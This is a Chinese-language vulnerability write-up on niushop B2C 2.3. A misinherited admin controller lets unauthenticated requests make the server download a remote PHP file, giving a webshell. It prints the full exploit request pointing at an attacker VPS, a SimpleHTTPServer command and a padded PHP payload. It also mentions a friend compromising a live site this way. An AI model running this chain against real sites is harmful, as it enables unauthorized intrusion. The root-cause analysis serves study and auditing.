0x00 前言
之前朋友叫幫忙看一個站,基於niushop cms,沒分析過這個CMS,也沒時間跟,今天問朋友已經拿下了
問了一下怎么搞的,將漏洞復現一下。(筆記除草,今年1月份的文章了?)
0x01 漏洞影響
版本:niushopB2C免費2.3
最后更新時間: 2019-04-18
是否0day:否 (屬於1 day)
0x02 漏洞詳情
看到文件 data\extend\upgrade\Upgrade.php update_file_download方法,該方法接受外部url來下載更新包,直接將包內容寫入
但注意下載的內容需要大於500字節。
全局搜索函數,在application\admin\controller\Upgradeonline.php 也就是Upgradeonline控制器,該控制器在后台目錄下,本應需要管理員權限,但代碼錯誤繼承自Controller類,而不是BaseController,導致無需登錄接口訪問
那么請求Upgradoneline的downloadPatchZip控制器,傳入download_url為我們的外網web php代碼文件,即可遠程下載文件到服務器上達到getshell
0x03 漏洞復現
構造請求包如下:
POST /index.php?s=/admin/Upgradeonline/downloadPatchZip HTTP/1.1 Host: target.com Content-Length: 58 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Language: zh-CN,zh;q=0.9 Connection: close download_url=http://vpsip:8090/1.php&patch_release=1
在vps上使用python開一個簡易的web服務器:
python -m SimpleHTTPServer 8090
1.php內容:(注釋內容為湊字節,以滿足500字節限制)
<?php phpinfo(); /* abcdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd abcdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd abcdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd abcdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd abcdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd */ ?>
下載成功
提取獲取到的路徑,訪問即可getshell:
0x04 總結
這個洞原理和thinkcmf x 的代碼執行是一個原理,基於tp的二開的cms代碼審計,都可以關注一下,基類控制器繼承錯誤導致的權限控制失敗問題。